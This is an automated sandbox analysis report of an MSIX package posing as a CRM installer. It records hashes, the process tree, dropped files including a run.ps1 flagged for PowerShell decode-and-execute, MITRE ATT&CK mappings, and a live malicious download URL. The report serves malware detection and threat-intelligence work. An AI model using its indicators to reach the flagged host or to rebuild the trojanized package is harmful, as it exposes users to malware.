Create Interactive Tour

Windows Analysis Report
crm_5.2.14.0_x64__c4g82jgbfsn1c.zip

Overview

General Information

Sample name:	crm_5.2.14.0_x64__c4g82jgbfsn1c.zip renamed because original name is a hash value
Original sample name:	crm_5.2.14.0_x64__c4g82jgbfsn1c.msix
Analysis ID:	1358913
MD5:	81b151d8d20a9141112a091f4844408a
SHA1:	02f2e210128cb93076e69ce529ffb7b054c6fcc2
SHA256:	f2f456731aa3fba67a245917e7721d818cfb633d67825edbc0602b8813ca6a5d
Infos:

Detection

Score:	60
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Yara detected Powershell dedcode and execute

PE file has nameless sections

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Drops PE files

Drops certificate files (DER)

Found dropped PE file which has not been started or loaded

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Classification

Process Tree

System is w10x64

unarchiver.exe (PID: 1036 cmdline: C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Desktop\crm_5.2.14.0_x64__c4g82jgbfsn1c.zip MD5: 16FF3CC6CC330A08EED70CBC1D35F5D2)

7za.exe (PID: 1568 cmdline: C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\jitnto4w.y21" "C:\Users\user\Desktop\crm_5.2.14.0_x64__c4g82jgbfsn1c.zip MD5: 77E556CDFDC5C592F5C46DB4127C6F4C)

conhost.exe (PID: 1840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Configuration

⊘No configs have been found

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\jitnto4w.y21\run.ps1	JoeSecurity_PowershellDedcodeAndExecute	Yara detected Powershell dedcode and execute	Joe Security

Sigma Signatures

⊘No Sigma rule has matched

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

• AV Detection
• Compliance
• Networking
• E-Banking Fraud
• System Summary
• Data Obfuscation
• Persistence and Installation Behavior
• Hooking and other Techniques for Hiding and Protection
• Malware Analysis System Evasion
• Anti Debugging
• HIPS / PFW / Operating System Protection Evasion
• Language, Device and Operating System Detection

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://sun47281.space/73689d8a-25b4-41cf-b693-05591ed804a7-7433f7b1-9997-477b-aadc-5a6e8d233c61?av=

Avira URL Cloud: Label: malware

Source: C:\Windows\SysWOW64\7za.exe

File created: C:\Users\user\AppData\Local\Temp\jitnto4w.y21\License.txt

Jump to behavior

Source: C:\Windows\SysWOW64\unarchiver.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll

Jump to behavior

Source:	Binary string: d:\Dev_A\KeePassNET\Build\ShInstUtil\Release\ShInstUtil.pdb source: ShInstUtil.exe.2.dr
Source:	Binary string: C:\ReleaseAI\tools\msix-psf\x64\Release\PsfRunDll64.pdb source: PsfRunDll64.exe.2.dr
Source:	Binary string: C:\ReleaseAI\tools\msix-psf\Win32\Release\PsfRunDll32.pdb source: PsfRunDll32.exe.2.dr
Source:	Binary string: C:\ReleaseAI\win\Release\stubs\x64\uwpstublauncher.pdb; source: AiStubX64.exe.2.dr
Source:	Binary string: C:\ReleaseAI\tools\msix-psf\Win32\Release\PsfRuntime32.pdb source: PsfRuntime32.dll.2.dr
Source:	Binary string: C:\ReleaseAI\tools\msix-psf\x64\Release\PsfRuntime64.pdb source: PsfRuntime64.dll.2.dr
Source:	Binary string: C:\ReleaseAI\win\Release\stubs\x64\uwpstublauncher.pdb source: AiStubX64.exe.2.dr

Source: PsfRuntime64.dll.2.dr, PsfRunDll32.exe.2.dr, PsfRunDll64.exe.2.dr, PsfRuntime32.dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: PsfRuntime64.dll.2.dr, PsfRunDll32.exe.2.dr, PsfRunDll64.exe.2.dr, PsfRuntime32.dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: PsfRuntime64.dll.2.dr, PsfRunDll32.exe.2.dr, PsfRunDll64.exe.2.dr, PsfRuntime32.dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: ShInstUtil.exe.2.dr	String found in binary or memory: http://ccsca2021.crl.certum.pl/ccsca2021.crl0s
Source: ShInstUtil.exe.2.dr	String found in binary or memory: http://ccsca2021.ocsp-certum.com05
Source: ShInstUtil.exe.2.dr	String found in binary or memory: http://crl.certum.pl/ctnca.crl0k
Source: ShInstUtil.exe.2.dr	String found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
Source: ShInstUtil.exe.2.dr	String found in binary or memory: http://crl.certum.pl/ctsca2021.crl0o
Source: 7za.exe, 00000002.00000003.1440734240.0000000001210000.00000004.00000800.00020000.00000000.sdmp, CodeIntegrity.cat.2.dr, AppxSignature.p7x.2.dr	String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: 7za.exe, 00000002.00000003.1440734240.0000000001210000.00000004.00000800.00020000.00000000.sdmp, CodeIntegrity.cat.2.dr, AppxSignature.p7x.2.dr	String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
Source: PsfRuntime64.dll.2.dr, PsfRunDll32.exe.2.dr, PsfRunDll64.exe.2.dr, PsfRuntime32.dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: PsfRuntime64.dll.2.dr, PsfRunDll32.exe.2.dr, PsfRunDll64.exe.2.dr, PsfRuntime32.dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: PsfRuntime64.dll.2.dr, PsfRunDll32.exe.2.dr, PsfRunDll64.exe.2.dr, PsfRuntime32.dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: PsfRuntime64.dll.2.dr, PsfRunDll32.exe.2.dr, PsfRunDll64.exe.2.dr, PsfRuntime32.dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: PsfRuntime64.dll.2.dr, PsfRunDll32.exe.2.dr, PsfRunDll64.exe.2.dr, PsfRuntime32.dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: PsfRuntime64.dll.2.dr, PsfRunDll32.exe.2.dr, PsfRunDll64.exe.2.dr, PsfRuntime32.dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: 7za.exe, 00000002.00000003.1440734240.0000000001210000.00000004.00000800.00020000.00000000.sdmp, CodeIntegrity.cat.2.dr, AppxSignature.p7x.2.dr	String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: 7za.exe, 00000002.00000003.1440734240.0000000001210000.00000004.00000800.00020000.00000000.sdmp, CodeIntegrity.cat.2.dr, AppxSignature.p7x.2.dr	String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: ShInstUtil.exe.2.dr	String found in binary or memory: http://repository.certum.pl/ccsca2021.cer0
Source: ShInstUtil.exe.2.dr	String found in binary or memory: http://repository.certum.pl/ctnca.cer09
Source: ShInstUtil.exe.2.dr	String found in binary or memory: http://repository.certum.pl/ctnca2.cer09
Source: ShInstUtil.exe.2.dr	String found in binary or memory: http://repository.certum.pl/ctsca2021.cer0
Source: 7za.exe, 00000002.00000003.1440734240.0000000001210000.00000004.00000800.00020000.00000000.sdmp, CodeIntegrity.cat.2.dr, AppxSignature.p7x.2.dr	String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: 7za.exe, 00000002.00000003.1440734240.0000000001210000.00000004.00000800.00020000.00000000.sdmp, CodeIntegrity.cat.2.dr, AppxSignature.p7x.2.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: ShInstUtil.exe.2.dr	String found in binary or memory: http://subca.ocsp-certum.com01
Source: ShInstUtil.exe.2.dr	String found in binary or memory: http://subca.ocsp-certum.com02
Source: ShInstUtil.exe.2.dr	String found in binary or memory: http://subca.ocsp-certum.com05
Source: PsfRuntime64.dll.2.dr, PsfRunDll32.exe.2.dr, PsfRunDll64.exe.2.dr, PsfRuntime32.dll.2.dr	String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: PsfRuntime64.dll.2.dr, PsfRunDll32.exe.2.dr, PsfRunDll64.exe.2.dr, PsfRuntime32.dll.2.dr	String found in binary or memory: http://t2.symcb.com0
Source: PsfRuntime64.dll.2.dr, PsfRunDll32.exe.2.dr, PsfRunDll64.exe.2.dr, PsfRuntime32.dll.2.dr	String found in binary or memory: http://tl.symcb.com/tl.crl0
Source: PsfRuntime64.dll.2.dr, PsfRunDll32.exe.2.dr, PsfRunDll64.exe.2.dr, PsfRuntime32.dll.2.dr	String found in binary or memory: http://tl.symcb.com/tl.crt0
Source: PsfRuntime64.dll.2.dr, PsfRunDll32.exe.2.dr, PsfRunDll64.exe.2.dr, PsfRuntime32.dll.2.dr	String found in binary or memory: http://tl.symcd.com0&
Source: ShInstUtil.exe.2.dr	String found in binary or memory: http://www.certum.pl/CPS0
Source: ShInstUtil.exe.2.dr	String found in binary or memory: https://keepass.info/
Source: run.ps1.2.dr	String found in binary or memory: https://sun47281.space/73689d8a-25b4-41cf-b693-05591ed804a7-7433f7b1-9997-477b-aadc-5a6e8d233c61?av=
Source: PsfRuntime64.dll.2.dr, PsfRunDll32.exe.2.dr, PsfRunDll64.exe.2.dr, PsfRuntime32.dll.2.dr	String found in binary or memory: https://www.advancedinstaller.com
Source: ShInstUtil.exe.2.dr	String found in binary or memory: https://www.certum.pl/CPS0
Source: 7za.exe, 00000002.00000003.1440734240.0000000001210000.00000004.00000800.00020000.00000000.sdmp, CodeIntegrity.cat.2.dr, AppxSignature.p7x.2.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: PsfRuntime64.dll.2.dr, PsfRunDll32.exe.2.dr, PsfRunDll64.exe.2.dr, PsfRuntime32.dll.2.dr	String found in binary or memory: https://www.thawte.com/cps0/
Source: PsfRuntime64.dll.2.dr, PsfRunDll32.exe.2.dr, PsfRunDll64.exe.2.dr, PsfRuntime32.dll.2.dr	String found in binary or memory: https://www.thawte.com/repository0W

Source: C:\Windows\SysWOW64\7za.exe

File created: C:\Users\user\AppData\Local\Temp\jitnto4w.y21\AppxMetadata\CodeIntegrity.cat

Jump to dropped file

System Summary

PE file has nameless sections

Source: PsfRuntime64.dll.2.dr

Static PE information: section name:

Source: classification engine

Classification label: mal60.evad.winZIP@4/29@0/0

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1840:120:WilError_03

Source: C:\Windows\SysWOW64\unarchiver.exe

File created: C:\Users\user\AppData\Local\Temp\unarchiver.log

Jump to behavior

Source: C:\Windows\SysWOW64\unarchiver.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\276d7f4a20a3c21c3bf6fc9bfc1915a2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Windows\SysWOW64\unarchiver.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\SysWOW64\unarchiver.exe C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Desktop\crm_5.2.14.0_x64__c4g82jgbfsn1c.zip
Source: C:\Windows\SysWOW64\unarchiver.exe	Process created: C:\Windows\SysWOW64\7za.exe C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\jitnto4w.y21" "C:\Users\user\Desktop\crm_5.2.14.0_x64__c4g82jgbfsn1c.zip
Source: C:\Windows\SysWOW64\7za.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\unarchiver.exe	Process created: C:\Windows\SysWOW64\7za.exe C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\jitnto4w.y21" "C:\Users\user\Desktop\crm_5.2.14.0_x64__c4g82jgbfsn1c.zip	Jump to behavior

Source: crm_5.2.14.0_x64__c4g82jgbfsn1c.zip

Static file information: File size 61630843 > 1048576

Source: C:\Windows\SysWOW64\unarchiver.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll

Jump to behavior

Source:	Binary string: d:\Dev_A\KeePassNET\Build\ShInstUtil\Release\ShInstUtil.pdb source: ShInstUtil.exe.2.dr
Source:	Binary string: C:\ReleaseAI\tools\msix-psf\x64\Release\PsfRunDll64.pdb source: PsfRunDll64.exe.2.dr
Source:	Binary string: C:\ReleaseAI\tools\msix-psf\Win32\Release\PsfRunDll32.pdb source: PsfRunDll32.exe.2.dr
Source:	Binary string: C:\ReleaseAI\win\Release\stubs\x64\uwpstublauncher.pdb; source: AiStubX64.exe.2.dr
Source:	Binary string: C:\ReleaseAI\tools\msix-psf\Win32\Release\PsfRuntime32.pdb source: PsfRuntime32.dll.2.dr
Source:	Binary string: C:\ReleaseAI\tools\msix-psf\x64\Release\PsfRuntime64.pdb source: PsfRuntime64.dll.2.dr
Source:	Binary string: C:\ReleaseAI\win\Release\stubs\x64\uwpstublauncher.pdb source: AiStubX64.exe.2.dr

Source: AiStubX64.exe.2.dr	Static PE information: real checksum: 0x0 should be: 0x9db3b
Source: PsfRuntime64.dll.2.dr	Static PE information: real checksum: 0x751d2 should be: 0x6ddfc
Source: iconv.dll.2.dr	Static PE information: real checksum: 0x0 should be: 0xe30bd

Source: PsfRunDll64.exe.2.dr	Static PE information: section name: _RDATA
Source: PsfRuntime32.dll.2.dr	Static PE information: section name: psf
Source: PsfRuntime32.dll.2.dr	Static PE information: section name: .detourc
Source: PsfRuntime32.dll.2.dr	Static PE information: section name: .detourd
Source: PsfRuntime64.dll.2.dr	Static PE information: section name: _RDATA
Source: PsfRuntime64.dll.2.dr	Static PE information: section name:
Source: PsfRuntime64.dll.2.dr	Static PE information: section name: .detourc
Source: PsfRuntime64.dll.2.dr	Static PE information: section name: .detourd
Source: AiStubX64.exe.2.dr	Static PE information: section name: _RDATA

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Source: C:\Windows\SysWOW64\7za.exe	File created: C:\Users\user\AppData\Local\Temp\jitnto4w.y21\PsfRuntime32.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\7za.exe	File created: C:\Users\user\AppData\Local\Temp\jitnto4w.y21\PsfRuntime64.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\7za.exe	File created: C:\Users\user\AppData\Local\Temp\jitnto4w.y21\VFS\AppData\iconv.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\7za.exe	File created: C:\Users\user\AppData\Local\Temp\jitnto4w.y21\PsfRunDll64.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\7za.exe	File created: C:\Users\user\AppData\Local\Temp\jitnto4w.y21\ShInstUtil.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\7za.exe	File created: C:\Users\user\AppData\Local\Temp\jitnto4w.y21\AI_STUBS\AiStubX64.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\7za.exe	File created: C:\Users\user\AppData\Local\Temp\jitnto4w.y21\Thunderbird%20Setup%20115.4.3.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\7za.exe	File created: C:\Users\user\AppData\Local\Temp\jitnto4w.y21\PsfRunDll32.exe	Jump to dropped file

Source: C:\Windows\SysWOW64\7za.exe

File created: C:\Users\user\AppData\Local\Temp\jitnto4w.y21\License.txt

Jump to behavior

Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\unarchiver.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\7za.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jitnto4w.y21\VFS\AppData\iconv.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\7za.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jitnto4w.y21\PsfRuntime64.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\7za.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jitnto4w.y21\PsfRuntime32.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\7za.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jitnto4w.y21\PsfRunDll64.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\7za.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jitnto4w.y21\ShInstUtil.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\7za.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jitnto4w.y21\AI_STUBS\AiStubX64.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\7za.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jitnto4w.y21\Thunderbird%20Setup%20115.4.3.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\7za.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jitnto4w.y21\PsfRunDll32.exe	Jump to dropped file

Source: C:\Windows\SysWOW64\unarchiver.exe TID: 1564

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Source: C:\Windows\SysWOW64\unarchiver.exe

Code function: 0_2_00C3B1D6 GetSystemInfo,

0_2_00C3B1D6

Source: C:\Windows\SysWOW64\unarchiver.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: Thunderbird%20Setup%20115.4.3.exe.2.dr

Binary or memory string: wTvmcI*

Source: C:\Windows\SysWOW64\unarchiver.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell dedcode and execute

Source: Yara match

File source: C:\Users\user\AppData\Local\Temp\jitnto4w.y21\run.ps1, type: DROPPED

Source: C:\Windows\SysWOW64\unarchiver.exe

Process created: C:\Windows\SysWOW64\7za.exe C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\jitnto4w.y21" "C:\Users\user\Desktop\crm_5.2.14.0_x64__c4g82jgbfsn1c.zip

Jump to behavior

Source: C:\Windows\SysWOW64\unarchiver.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact	Resource Development	Reconnaissance
Valid Accounts	Windows Management Instrumentation	Path Interception	11 Process Injection	1 Disable or Modify Tools	OS Credential Dumping	1 Security Software Discovery	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Data Obfuscation	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Abuse Accessibility Features	Acquire Infrastructure	Gather Victim Identity Information
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	21 Virtualization/Sandbox Evasion	LSASS Memory	21 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Junk Data	SIM Card Swap	Obtain Device Cloud Backups	Network Denial of Service	Domains	Credentials
Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Software Packing	Security Account Manager	3 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography			Data Encrypted for Impact	DNS Server	Email Addresses
Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Traffic Duplication	Protocol Impersonation			Data Destruction	Virtual Private Server	Employee Names
Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Scheduled Transfer	Fallback Channels			Data Encrypted for Impact	Server	Gather Victim Network Information

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
http://subca.ocsp-certum.com05	0%	URL Reputation	safe
http://subca.ocsp-certum.com02	0%	URL Reputation	safe
http://subca.ocsp-certum.com01	0%	URL Reputation	safe
https://sun47281.space/73689d8a-25b4-41cf-b693-05591ed804a7-7433f7b1-9997-477b-aadc-5a6e8d233c61?av=	100%	Avira URL Cloud	malware
http://ccsca2021.ocsp-certum.com05	0%	Avira URL Cloud	safe

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.certum.pl/ctsca2021.crl0o	ShInstUtil.exe.2.dr	false		high
https://sun47281.space/73689d8a-25b4-41cf-b693-05591ed804a7-7433f7b1-9997-477b-aadc-5a6e8d233c61?av=	run.ps1.2.dr	false	Avira URL Cloud: malware	unknown
http://repository.certum.pl/ctnca.cer09	ShInstUtil.exe.2.dr	false		high
http://repository.certum.pl/ctsca2021.cer0	ShInstUtil.exe.2.dr	false		high
https://www.thawte.com/cps0/	PsfRuntime64.dll.2.dr, PsfRunDll32.exe.2.dr, PsfRunDll64.exe.2.dr, PsfRuntime32.dll.2.dr	false		high
http://crl.certum.pl/ctnca.crl0k	ShInstUtil.exe.2.dr	false		high
http://subca.ocsp-certum.com05	ShInstUtil.exe.2.dr	false	URL Reputation: safe	unknown
https://www.thawte.com/repository0W	PsfRuntime64.dll.2.dr, PsfRunDll32.exe.2.dr, PsfRunDll64.exe.2.dr, PsfRuntime32.dll.2.dr	false		high
http://subca.ocsp-certum.com02	ShInstUtil.exe.2.dr	false	URL Reputation: safe	unknown
http://subca.ocsp-certum.com01	ShInstUtil.exe.2.dr	false	URL Reputation: safe	unknown
https://keepass.info/	ShInstUtil.exe.2.dr	false		high
http://crl.certum.pl/ctnca2.crl0l	ShInstUtil.exe.2.dr	false		high
http://repository.certum.pl/ctnca2.cer09	ShInstUtil.exe.2.dr	false		high
https://www.advancedinstaller.com	PsfRuntime64.dll.2.dr, PsfRunDll32.exe.2.dr, PsfRunDll64.exe.2.dr, PsfRuntime32.dll.2.dr	false		high
http://ccsca2021.crl.certum.pl/ccsca2021.crl0s	ShInstUtil.exe.2.dr	false		high
http://ccsca2021.ocsp-certum.com05	ShInstUtil.exe.2.dr	false	Avira URL Cloud: safe	unknown
https://www.certum.pl/CPS0	ShInstUtil.exe.2.dr	false		high
http://www.certum.pl/CPS0	ShInstUtil.exe.2.dr	false		high
http://repository.certum.pl/ccsca2021.cer0	ShInstUtil.exe.2.dr	false		high

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox version:	38.0.0 Ammolite
Analysis ID:	1358913
Start date and time:	2023-12-11 20:31:02 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 50s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Potential for more IOCs and behavior
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	crm_5.2.14.0_x64__c4g82jgbfsn1c.zip renamed because original name is a hash value
Original Sample Name:	crm_5.2.14.0_x64__c4g82jgbfsn1c.msix
Detection:	MAL
Classification:	mal60.evad.winZIP@4/29@0/0
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 45 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .zip Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): dllhost.exe
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: crm_5.2.14.0_x64__c4g82jgbfsn1c.zip

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\Users\user\AppData\Local\Temp\jitnto4w.y21\PsfRunDll32.exe	Twitch_Ventures-x64.zip	Get hash	malicious	Unknown	Browse
	PDF Extra-x86.zip	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\jitnto4w.y21\AI_STUBS\AiStubX64.exe

Download File

Process:	C:\Windows\SysWOW64\7za.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	587776
Entropy (8bit):	6.35496199767312
Encrypted:	false
SSDEEP:	12288:RU0wh8g3nKlFzfFeOVYP3c6g6gj7Pqo86uuK+f:R0h8g3nKlFzdl6gZHqd/+f
MD5:	6EEDC7761B1540EBC7A260B2A4B2A60B
SHA1:	60DED72EAFF1672C0FE563130972AD957D05AAE0
SHA-256:	0FD2969BBE6ECD92A21A0E994B62EFDAFC1FFEAD78CAE417A203E57347FFA145
SHA-512:	5D7D73B6041226B97AA9AC84C77688EFD3AE3B25CB70922C3BE64F6CA0E6C5E80637CB3F9B8A4DAF97BF78D59FCAF8CC452496E7D99A244B180B81C9350C1280
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........K..h...h...h.}.k...h.}.m...h...l...h...k...h...m..h.}.l...h.}.n...h.......h.}.i...h...i.^.h.o.a...h.o.....h.......h.o.j...h.Rich..h.................PE..d.....c.........."....".$.....................@.............................p............`..................................................r.......0..X.......TN...........P......$...p.......................(....c..@............@..@....q..@....................text....#.......$.................. ..`.rdata...E...@...F...(..............@..@.data....1...........n..............@....pdata..TN.......P..................@..@_RDATA..\.... ......................@..@.rsrc...X....0......................@..@.reloc.......P......................@..B................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\jitnto4w.y21\AppxBlockMap.xml

Download File

Process:	C:\Windows\SysWOW64\7za.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (65480), with CRLF line terminators
Category:	dropped
Size (bytes):	73592
Entropy (8bit):	5.886687164926226
Encrypted:	false
SSDEEP:	1536:fR34Nmepzgiiq596X0LoDhJYj4cO9BeSewep5k/6:fRghpz9iqT6oeJ0/gcShji
MD5:	24C2B97CB21A60929827CB440CE62399
SHA1:	A94C23BC2EE8E1A8695874565D34DDB534E1DBDA
SHA-256:	8CE87C99ABA462B0A4484B017F22425A12DDCA47B44B151FB55EC1A68F40F2D1
SHA-512:	D9BD6C0D864BAA24C9F39438BB70519EA18D10F2A91451CA1B518F7F3D3D376FE67592E70DEF68D07080F990865CE9D67791FC00640A25C631A61E9A234DFEEA
Malicious:	false
Reputation:	low
